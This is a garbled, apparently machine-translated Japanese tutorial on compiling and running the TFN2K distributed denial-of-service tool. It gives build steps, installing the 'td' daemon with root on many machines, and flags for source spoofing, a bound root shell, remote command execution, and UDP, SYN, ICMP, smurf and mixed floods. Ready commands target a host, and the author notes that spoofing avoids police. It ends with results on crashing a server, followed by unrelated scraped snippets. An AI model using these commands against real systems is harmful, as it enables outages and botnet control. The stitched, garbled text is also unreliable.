まず最初に、攻撃に使用したクライアントとサーバーの設定方法をテストに最も有名なREDHAT LINUXを使用して、この攻撃テストではFEDORA CORE3、ソフトウェアを使用しました。最も有名なDDOSを使用してください。
まず最初に、テストに最も有名なREDHAT LINUXを使って攻撃していたクライアントとサーバーの設定方法この攻撃テストにはFEDORA CORE3を使いましたソフトウェアは最も有名なDDOSを使います。 。
意味のない話をしないで、サーバーの設定を始めてください。
tar -zxvf tfn2k.tgzの解凍
1. TFN2Kのインストール
TFN2Kはオープンソースソフトウェアですので、コンパイルする必要があります。それはすべてですが、Linuxのバージョンやベンダーによって設定が異なるため、注意すべき点がいくつかあります。
最初にsrc /ip.hを修正します。
以下のセクションをコメントアウトしてください。そうでなければコンパイルは間違ったものになります。
/* struct in_addr
{
unsigned long int s_addr;
}; * /
次にコンパイルを実行します
>
コンパイル時に、パスワードを8〜32桁に設定するためにサーバーを入力するように促されます(攻撃時にパスワードを入力する必要があります)コンパイル後、2つの新しい実行可能ファイルtdとtfnが表示されます。機械を使用する過程。 tfnはサーバー制御プロセスで、他人を攻撃したい場合はまずtdのプロセスを開始してからサーバープロセスを実行する必要がありますそれ以外の場合は攻撃は無効ですパスワードを変更してmkpassを実行して変更します。最後に、すべてのクライアントにtd(ルート権限が必要)をインストールして実行し、サーバー上にテキストファイルを作成しますすべてのクライアントIPアドレスはファイルに記録されます(VIで編集することは可能です)。 >
192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
…… < Br>
メインサーバーで実行します/tfn
II。アタック
./tfn直接入力すると、いくつかのパラメータが表示されますが、英語で親友は私を必要としません詳しくはこちらをご覧ください。)
Format./tfn< Parameters>
使用できないパラメータこの攻撃には言及していません。
-fを使用します。ちょうど書かれたテキストファイルの名前は本当のDDOS攻撃であり、DOSの攻撃ではありません。
-h DOS攻撃は単一のマシンであり、一対一の攻撃の後にホストまたはIPアドレスが続きます。
-pあとでポートを指定します。言うまでもないことです。
-c最も重要なパラメータ、合計11段階
0 - 攻撃を止めて、良いものを使ってください。 > 1 - TFNツールは攻撃時に送信元アドレスを含むパケットを送信しますが、送信元アドレスはランダムであるため、アドレスが自己完結型ではないため、警察を心配する必要はありません。 Haha
2 - パケットのパケットサイズを調整する:デフォルトのICMP /8、smurf、udp攻撃は、デフォルトで最小のパッケージになります。各パッケージのペイロードのバイト数を変更することでサイズを増やすことができます。
3 - ルートシェルをバインドします。セッションサービスを開始すると、特定のポートに接続してルートシェルを取得できます。
4 - UDPフラッド攻撃:この攻撃では、各UDPパケットがクローズドポートに送信されるため、ICMP到達不能メッセージが返されるため、攻撃の可能性が高まります。
5 - SYNフラッド攻撃:この攻撃は定期的に誤った接続要求を送信します。その結果、ターゲットポートのサービス拒否攻撃が発生し、TCP接続テーブルが追加され、存在しないホストへのTCP /RST応答による攻撃の可能性が高まります。これは標準のサービス拒否攻撃です。
6 - ICMP応答(ping)攻撃:この攻撃は偽のアドレスに対するping要求を送信し、ターゲットホストは同じサイズの応答パケットを返します。
7 - SMURFアタック:ターゲットホストが複数回応答するように、ターゲットホストのアドレスを指定してpingリクエストを送信して拡張をブロードキャストします。
8 - MIXアタック:1:1:1の関係でudp、syn、icmpパケットを交互に送信すると、ルーター、他のパケット転送装置、NIDS、スニファなどに対処し、爆撃をすることができます:) Br>
9 - TARGA3 Attack
10 - リモートコマンド実行、このパラメータはTFNの追加機能であり、実際にはTFNアタックはDOSだけでなく以下のようなリモートコントロールでもあります。 >
./tfn -f hostext -c 10 -i" mkdir /root /edison"すべてのHOSTのルートディレクトリにedisonを作成し、続いて" command>
パラメータ基本的に、次のような攻撃が行われます。
./tfn -f hostext -c 4 -i www.xxx.com
163サーバーへのUDP攻撃を実行するために、hostextファイルに記録されたホストを使用します(すべてtdプロセスはホスト内で開始する必要があります。hostextファイルに記録されているホストを使用して、163サーバーを実行します。
./tfn -f hostext -c 5 -i www.xxx.com -p 80 TCPサービス妨害攻撃(80の攻撃Web、他の言うまでもなく)
./tfn -f hostext -c 6 -i www.xxx.com
hostextファイルへの記録ホストが163サーバーに対してICMP攻撃を実行します(PING攻撃、バッファオーバーフローがすぐにクラッシュします)。
./tfn -f hostext -c 8 -i www.xxx.com
hostextファイルへの記録ホストが163サーバーに対してICMPとTCPとUDPのラウンドアタックを実行します(相手が詮索しなければならない場合)
./tfn -f hostext -c 0
ホストによる攻撃を停止させます< Br>
基本的に、私のテスト結果について最後に話してください。
1対1の攻撃、攻撃モードTCP接続モードローカルローカルCPU 13%攻撃を受けたサーバーのCPU使用率は70%以上で、時々変動します
2対1攻撃、攻撃モードTCP接続モードローカルローカルスタンドアロンCPU 13%攻撃されたサーバーのCPU使用率100%
5対1攻撃、攻撃モードTCP接続モードローカルローカルスタンドアロンCPU 13 %攻撃を受けているサーバーがクラッシュしました自宅には6台のコンピューターしかありませんが、さらに数十台のコンピューターがあると、平均的なパーソナルサーバーが停止します。
1対1の攻撃、攻撃モードICMP接続ローカルローカルCPUが18%、サーバーのCPU使用率が96%以上攻撃サーバは死の30分以内に、使用することはほとんど不可能、アクセスできませんでした2対1の攻撃、攻撃のICMP接続ローカルローカルスタンドアロンCPU18%随時変動する。これは、電力が小さいではないようです。
どちらの関数も一度に1行ずつ入力することができます。ただし、getsは廃止予定の関数であるため、getsを使用してバッファの長さを指定できないため、バッファがオーバーフローする可能性があります。標準入
1のLinuxでのリモート接続のSSHとVNCグラフィカルモードは、VNCは/停止/再起動#serviceが開始vncserverを起動/停止/再起動して、特定のコマンドのvncserverをシャット
Windowsでは、Sogou Pinyin入力方式は語彙が多く認識率が高いためにユーザー数が多く、インストールに必要な入力方式となっています。そこ新星Sogou入
のインストール 1. Oracle VM virtualBoxをインストールします。バージョン4.0を使用しています。公式のダウンロードアドレスはこちらです。 2.仮想マシンのヘルプファイルを参照